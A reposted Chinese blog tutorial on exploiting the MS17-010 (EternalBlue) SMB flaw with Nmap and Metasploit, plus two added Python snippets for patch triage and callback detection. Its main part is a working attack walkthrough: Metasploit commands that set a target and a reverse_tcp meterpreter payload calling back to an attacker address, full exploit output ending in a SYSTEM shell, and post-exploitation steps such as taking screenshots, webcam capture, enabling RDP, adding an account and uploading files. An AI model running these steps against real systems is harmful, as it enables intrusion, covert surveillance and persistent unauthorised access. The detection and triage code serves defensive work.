MS 17010

---
title: MS17-010 exploitation notes
date: 2018-08-15 11:14:55
tags:
- Kali penetration testing
- Featured articles
categories: Kali penetration testing
---

<img src="/Picture/页首图片/Kali_TiQuan.jpg" alt="Kali" />

When the NSA toolkit was first leaked, everyone was busy learning how to run the "EternalBlue" attack it contained. I expect everyone who tried it found the process clumsy and spent quite some effort getting it to work, and every run needed the right environment prepared first. Today I want to share what we have just learned: using the MSF framework to exploit the "MS17-010" vulnerability quickly.

The fast "EternalBlue" attack with MSF simply means using the exploit module for ms17-010 that Metasploit recently added to attack the host and obtain control of it. Below I briefly record the tools needed, the exploitation process, and some basic post-exploitation steps.

<escape><!-- more --></escape>

<h3>Scan for hosts that have port 445 open and are vulnerable.</h3>

a. Create a file named smb-vuln-ms17-010.nse with the following contents:

```Code
local nmap = require "nmap"
local smb = require "smb"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"

description = [[
Attempts to detect if a Microsoft SMBv1 server is vulnerable to a remote code
execution vulnerability (ms17-010, a.k.a. EternalBlue).
The vulnerability is actively exploited by WannaCry and Petya ransomware and other malware.

The script connects to the $IPC tree, executes a transaction on FID 0 and
checks if the error "STATUS_INSUFF_SERVER_RESOURCES" is returned to
determine if the target is not patched against ms17-010. Additionally it checks
for known error codes returned by patched systems.

Tested on Windows XP, 2003, 7, 8, 8.1, 10, 2008, 2012 and 2016.

References:
* https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
* https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
* https://msdn.microsoft.com/en-us/library/ee441489.aspx
* https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb
* https://github.com/cldrn/nmap-nse-scripts/wiki/Notes-about-smb-vuln-ms17-010
]]

---
-- @usage nmap -p445 --script smb-vuln-ms17-010 <target>
-- @usage nmap -p445 --script vuln <target>
--
-- @see smb-double-pulsar-backdoor.nse
--
-- @output
-- Host script results:
-- | smb-vuln-ms17-010:
-- |   VULNERABLE:
-- |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
-- |     State: VULNERABLE
-- |     IDs:  CVE:CVE-2017-0143
-- |     Risk factor: HIGH
-- |       A critical remote code execution vulnerability exists in Microsoft SMBv1
-- |       servers (ms17-010).
-- |
-- |     Disclosure date: 2017-03-14
-- |     References:
-- |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
-- |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
-- |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
--
-- @xmloutput
-- <table key="CVE-2017-0143">
--   <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
--   <elem key="state">VULNERABLE</elem>
--   <table key="ids">
--     <elem>CVE:CVE-2017-0143</elem>
--   </table>
--   <table key="description">
--     <elem>A critical remote code execution vulnerability exists in Microsoft SMBv1&#xa; servers (ms17-010).&#xa;</elem>
--   </table>
--   <table key="dates">
--     <table key="disclosure">
--       <elem key="month">03</elem>
--       <elem key="year">2017</elem>
--       <elem key="day">14</elem>
--     </table>
--   </table>
--   <elem key="disclosure">2017-03-14</elem>
--   <table key="refs">
--     <elem>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</elem>
--     <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143</elem>
--     <elem>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</elem>
--   </table>
-- </table>
--
-- @args smb-vuln-ms17-010.sharename Share name to connect. Default: IPC$
---

author = "Paulino Calderon <paulino()calderonpale.com>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}

hostrule = function(host)
  return smb.get_port(host) ~= nil
end

local function check_ms17010(host, port, sharename)
  local status, smbstate = smb.start_ex(host, true, true, "\\\\".. host.ip .. "\\" .. sharename, nil, nil, nil)
  if not status then
    stdnse.debug1("Could not connect to '%s'", sharename)
    return false, string.format("Could not connect to '%s'", sharename)
  else
    local overrides = {}
    local smb_header, smb_params, smb_cmd

    stdnse.debug1("Connected to share '%s'", sharename)

    overrides['parameters_length'] = 0x10

    --SMB_COM_TRANSACTION opcode is 0x25
    smb_header = smb.smb_encode_header(smbstate, 0x25, overrides)
    smb_params = string.pack(">I2 I2 I2 I2 B B I2 I4 I2 I2 I2 I2 I2 B B I2 I2 I2 I2 I2 I2",
      0x0,    -- Total Parameter count (2 bytes)
      0x0,    -- Total Data count (2 bytes)
      0xFFFF, -- Max Parameter count (2 bytes)
      0xFFFF, -- Max Data count (2 bytes)
      0x0,    -- Max setup Count (1 byte)
      0x0,    -- Reserved (1 byte)
      0x0,    -- Flags (2 bytes)
      0x0,    -- Timeout (4 bytes)
      0x0,    -- Reserved (2 bytes)
      0x0,    -- ParameterCount (2 bytes)
      0x4a00, -- ParameterOffset (2 bytes)
      0x0,    -- DataCount (2 bytes)
      0x4a00, -- DataOffset (2 bytes)
      0x02,   -- SetupCount (1 byte)
      0x0,    -- Reserved (1 byte)
      0x2300, -- PeekNamedPipe opcode
      0x0,    --
      0x0700, -- BCC (Length of "\PIPE\")
      0x5c50, -- \P
      0x4950, -- IP
      0x455c  -- E\
    )
    stdnse.debug2("SMB: Sending SMB_COM_TRANSACTION")
    local result, err = smb.smb_send(smbstate, smb_header, smb_params, '', overrides)
    if(result == false) then
      stdnse.debug1("There was an error in the SMB_COM_TRANSACTION request")
      return false, err
    end

    local result, smb_header, _, _ = smb.smb_read(smbstate)
    if not result then
      stdnse.debug1("Error reading SMB response: %s", smb_header)
      -- error can happen if an (H)IPS resets the connection
      return false, smb_header
    end

    local _ , smb_cmd, err = string.unpack("<c4 B I4", smb_header)
    if smb_cmd == 37 then -- SMB command for Trans is 0x25
      stdnse.debug1("Valid SMB_COM_TRANSACTION response received")

      --STATUS_INSUFF_SERVER_RESOURCES indicates that the machine is not patched
      if err == 0xc0000205 then
        stdnse.debug1("STATUS_INSUFF_SERVER_RESOURCES response received")
        return true
      elseif err == 0xc0000022 then
        stdnse.debug1("STATUS_ACCESS_DENIED response received. This system is likely patched.")
        return false, "This system is patched."
      elseif err == 0xc0000008 then
        stdnse.debug1("STATUS_INVALID_HANDLE response received. This system is likely patched.")
        return false, "This system is patched."
      end
      stdnse.debug1("Error code received:%s", stdnse.tohex(err))
    else
      stdnse.debug1("Received invalid command id.")
      return false, string.format("Unexpected SMB response:%s", stdnse.tohex(err))
    end
  end
end

action = function(host,port)
  local vuln_status, err
  local vuln = {
    title = "Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)",
    IDS = {CVE = 'CVE-2017-0143'},
    risk_factor = "HIGH",
    description = [[
A critical remote code execution vulnerability exists in Microsoft SMBv1
servers (ms17-010).
    ]],
    references = {
      'https://technet.microsoft.com/en-us/library/security/ms17-010.aspx',
      'https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/'
    },
    dates = {
      disclosure = {year = '2017', month = '03', day = '14'},
    }
  }
  local sharename = stdnse.get_script_args(SCRIPT_NAME .. ".sharename") or "IPC$"
  local report = vulns.Report:new(SCRIPT_NAME, host, port)
  vuln.state = vulns.STATE.NOT_VULN

  vuln_status, err = check_ms17010(host, port, sharename)
  if vuln_status then
    stdnse.debug1("This host is missing the patch for ms17-010!")
    vuln.state = vulns.STATE.VULN
  else
    vuln.state = vulns.STATE.NOT_VULN
    vuln.check_results = err
  end
  return report:make_output(vuln)
end
```

b. Scan for the vulnerability with Nmap.

The targeted MS17-010 scan command is as follows:

```Code
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open
```
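The scan above prints a per-host report; for patch tracking across a whole /24 it is more practical to save Nmap's XML output (`-oX`) and extract which hosts the script marked VULNERABLE. The Python below is an added example, not part of the original post or of Nmap: it parses a constructed XML fragment shaped after the script's `@xmloutput` block (the `check_results` entry for the patched host and the second and third hosts are assumptions for illustration) and turns it into a patch worklist. The vulns library only reports VULNERABLE hosts unless the scan is run with `--script-args vulns.showall=1`, which the sample assumes.

```python
import xml.etree.ElementTree as ET

SCRIPT_ID = "smb-vuln-ms17-010"
VULN_KEY = "CVE-2017-0143"

# Constructed sample of `nmap -oX` output for three hosts (not real scan data).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -n -p445 --script smb-vuln-ms17-010 -oX - 192.168.1.0/24">
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="192.168.1.112" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/></port></ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE: ...">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
          <table key="ids"><elem>CVE:CVE-2017-0143</elem></table>
          <elem key="disclosure">2017-03-14</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="192.168.1.113" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/></port></ports>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE: ...">
        <table key="CVE-2017-0143">
          <elem key="state">NOT VULNERABLE</elem>
          <table key="check_results"><elem>This system is patched.</elem></table>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="192.168.1.120" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="closed" reason="reset"/></port></ports>
  </host>
</nmaprun>
"""


def triage_ms17_010(xml_text):
    """Map every scanned IPv4 host to a triage state derived from the script's XML table.

    States: VULNERABLE, NOT VULNERABLE, NO_SMB (445 not open), NOT_CHECKED (no script result).
    """
    root = ET.fromstring(xml_text)
    results = {}
    for host in root.findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        port_state = host.find("ports/port[@portid='445']/state")
        if port_state is None or port_state.get("state") != "open":
            results[ip] = {"state": "NO_SMB", "detail": "port 445 not open"}
            continue
        script = host.find("hostscript/script[@id='%s']" % SCRIPT_ID)
        table = script.find("table[@key='%s']" % VULN_KEY) if script is not None else None
        if table is None:
            results[ip] = {"state": "NOT_CHECKED", "detail": "script produced no result"}
            continue
        state = table.findtext("elem[@key='state']") or "UNKNOWN"
        # check_results is written as a table of lines for non-vulnerable hosts; accept an elem too
        detail = table.findtext("table[@key='check_results']/elem") \
            or table.findtext("elem[@key='check_results']") or ""
        results[ip] = {"state": state, "detail": detail}
    return results


def vulnerable_hosts(xml_text):
    """Sorted list of hosts that still need the MS17-010 patch."""
    return sorted(ip for ip, r in triage_ms17_010(xml_text).items() if r["state"] == "VULNERABLE")


if __name__ == "__main__":
    for ip, r in sorted(triage_ms17_010(SAMPLE_NMAP_XML).items()):
        print("%-15s %-15s %s" % (ip, r["state"], r["detail"]))
    print("patch worklist:", vulnerable_hosts(SAMPLE_NMAP_XML))
```

Feed it a real file with `triage_ms17_010(open("scan.xml").read())`; hosts in the NOT_CHECKED state (port open but no script result, typically a closed connection or an IPS reset) deserve a rescan rather than being treated as patched.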

c. Scan with an MSF auxiliary module

Instead of running a targeted vulnerability scan with nmap directly, we can also scan with the scanner module among MSF's "auxiliary" modules. Anyone familiar with MSF knows that its scanner modules are basically implemented by calling nmap. Here is a short note on scanning for the vulnerability with the "auxiliary/scanner/" module.

```Code
msfconsole                                # start the MSF console

search smb_ms17_010                       # find the exact path of the scanner module
use auxiliary/scanner/smb/smb_ms17_010    # load the vulnerability scanner module
show options                              # list the module's settings
set RHOSTS 192.168.1.1-254                # set the scan targets (scanner modules use RHOSTS)
set THREADS 30                            # set the number of scan threads
run                                       # run the scan
```

<br>

<h3>Launch the attack directly from the MSF framework.</h3>

```Code
msfconsole                                    # start the MSF console
version                                       # make sure the framework is version 4.14.17 or newer

search ms17_010                               # look up the exploit module path
use exploit/windows/smb/ms17_010_eternalblue  # load the exploit module
set RHOST 192.168.1.112                       # set the target
exploit                                       # launch the attack
```

<h3>MSF post-exploitation: maintaining access</h3>

Payload theory

This is a good place to go over the basic concept of a "payload" in the MSF framework. So what is a payload?
A payload is the code that establishes a stable connection between the target machine and the attacker's machine and returns a shell; it can also do things such as process injection. There are three types of payload.

(1) singles (standalone payloads)
A single is self-contained: it can be planted in the target system and executes its function directly, for example the shell_bind_tcp payload.

(2) stagers
A stager sets up a stable network connection between the target machine and the attacker's machine and works together with a stage. Stagers are usually very small, so they are easy to inject after exploitation; they all behave much the same and fall into two kinds, bind and reverse.

bind: the attacker's machine connects to a port on the target;
reverse: the target connects back to the attacker's machine, so the attacker's IP address and port must be configured in advance.

(3) stages
Stages are payloads such as shell and meterpreter. Once the stager has established a stable connection, the attacker's machine sends the stage to the target; the stager receives it and hands control over to the stage, which yields, for example, a shell on the target or a running meterpreter, so commands typed on the attacker's side control the target.
It follows that meterpreter is itself a payload that runs with a stager and a matching stage. Meterpreter runs in memory through DLL injection and leaves no file on the target's disk, which makes it hard to find during an intrusion; that is exactly why meterpreter is so reliable and stable.
6.2 Understanding payloads

That was a lot of text and may be hard to follow. The simple version is that payloads come in two broad types:

(1) Single
The word single already suggests that this kind of payload is standalone. Combined with the definition above, we can see that a payload generally does two things:
1. establish the network connection between the target host and the attacking host;
2. on top of that connection, obtain control of the target host, that is, a shell that can be operated.

(2) Staged payloads
Once we understand that a complete payload consists of two parts, the staged type is easy: the original single is split into two parts, a stager and a stage.
For example "windows/meterpreter/reverse_tcp" consists of a stager (reverse_tcp) and a stage (meterpreter); its function is equivalent to the single payload "windows/shell_reverse_tcp".
6.3 Meterpreter payload in practice

Here we use the MS17-010 exploit module together with the meterpreter payload for a hands-on run: we obtain a meterpreter session through the EternalBlue vulnerability and, along the way, see how powerful meterpreter is.
The attack flow is basically the same as before, with one extra step, configuring the payload; the exact settings are as follows.

```Code
msf > use exploit/windows/smb/ms17_010_eternalblue   # load the ms17-010 EternalBlue exploit module

msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.112   # set the target to 192.168.1.112
rhost => 192.168.1.112

msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp   # select the reverse-connect payload
payload => windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.118   # have meterpreter connect back to 192.168.1.118
lhost => 192.168.1.118

msf exploit(ms17_010_eternalblue) > show options   # review the attack settings

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.1.112    yes       The target address
   RPORT               445              yes       The target port (TCP)
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.118    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > exploit   # launch the attack

[*] Started reverse TCP handler on 192.168.1.118:4444
[*] 192.168.1.112:445 - Connecting to target for exploitation.
[+] 192.168.1.112:445 - Connection established for exploitation.
[+] 192.168.1.112:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.112:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.1.112:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.1.112:445 - 0x00000010  74 65 20 36 2e 31 00                             te 6.1
[+] 192.168.1.112:445 - Target arch selected valid for OS indicated by DCE/RPC reply
[*] 192.168.1.112:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.112:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.112:445 - Starting non-paged pool grooming
[+] 192.168.1.112:445 - Sending SMBv2 buffers
[+] 192.168.1.112:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.112:445 - Sending final SMBv2 buffers.
[*] 192.168.1.112:445 - Sending last fragment of exploit packet!
[*] 192.168.1.112:445 - Receiving response from exploit packet
[+] 192.168.1.112:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.112:445 - Sending egg to corrupted connection.
[*] 192.168.1.112:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.1.112
[*] Meterpreter session 1 opened (192.168.1.118:4444 -> 192.168.1.112:49177) at 2017-06-07 13:42:17 +0800
[+] 192.168.1.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.112:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > getuid   # the current user is SYSTEM, i.e. the highest privilege
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo   # the system is Windows 7
Computer        : CHINAMAN-PC
OS              : Windows 7 (Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows
meterpreter >
```

From the session above we have a shell; operations that can be performed on the target host include:

```Code
getuid                              # confirm we hold the highest privilege
sysinfo                             # query system information
screenshot                          # capture the screen
webcam_snap                         # capture a webcam image
run post/windows/manage/enable_rdp  # enable Remote Desktop
shell                               # drop into a system shell, then add an account: net user test 123 /add
upload c:/a.exe a.exe               # upload a file
```
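From a defender's side, the reverse-connect stager described in the payload section and the session log above leave a distinctive network trace: an inbound connection to the server's port 445, followed within seconds by a new outbound connection from that server back to the same peer on an arbitrary port (here 192.168.1.112:49177 -> 192.168.1.118:4444, opened at 13:42:17). The Python below is an added example, not code from the original post or from Metasploit: it runs that correlation over a constructed flow log (the inbound SMB timestamp and the two benign flows are assumptions for illustration) and flags the callback. A server that legitimately connects back to its clients will trigger it too, so an allowlist of expected server-to-client ports is needed before it is used for alerting.

```python
from datetime import datetime, timedelta

SMB_PORT = 445

# Constructed flow records (timestamp, src_ip, src_port, dst_ip, dst_port), modelled on the
# addresses and ports in the session log above; the inbound SMB time is an assumed value.
SAMPLE_FLOWS = [
    ("2017-06-07 13:41:50", "192.168.1.118", 50211, "192.168.1.112", 445),   # exploit connects to SMB
    ("2017-06-07 13:42:17", "192.168.1.112", 49177, "192.168.1.118", 4444),  # server calls back to LPORT
    ("2017-06-07 13:45:00", "192.168.1.50", 51000, "192.168.1.112", 445),    # ordinary file-share client
    ("2017-06-07 14:10:03", "192.168.1.112", 49300, "10.0.0.5", 443),        # normal outbound HTTPS
]


def find_smb_callbacks(flows, window=timedelta(minutes=5), allowed_callback_ports=frozenset()):
    """Flag outbound connections from an SMB server to a peer that connected to its port 445 shortly before.

    A staged reverse payload delivered through SMB produces exactly this inbound-445-then-outbound pair.
    Ports in allowed_callback_ports are ignored so that expected server-to-client traffic is not reported.
    """
    parsed = [(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), s, sp, d, dp) for ts, s, sp, d, dp in flows]
    parsed.sort(key=lambda f: f[0])
    last_inbound_smb = {}  # (server_ip, client_ip) -> time of the most recent inbound SMB connection
    alerts = []
    for ts, src, sport, dst, dport in parsed:
        if dport == SMB_PORT:
            last_inbound_smb[(dst, src)] = ts
            continue
        if dport in allowed_callback_ports:
            continue
        seen = last_inbound_smb.get((src, dst))
        if seen is not None and ts - seen <= window:
            alerts.append({
                "server": src,
                "peer": dst,
                "callback_port": dport,
                "seconds_after_smb": int((ts - seen).total_seconds()),
            })
    return alerts


if __name__ == "__main__":
    for a in find_smb_callbacks(SAMPLE_FLOWS):
        print("possible reverse-shell callback: %(server)s -> %(peer)s:%(callback_port)d, "
              "%(seconds_after_smb)ds after inbound SMB" % a)
```

The same logic maps directly onto firewall or NetFlow exports; the window should be short (the stage in the log above was delivered within seconds of the SMB connection) so that a client later browsing a share on the server does not match.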

Reposted from www.cnblogs.com/jiangmeiyue/p/9492727.html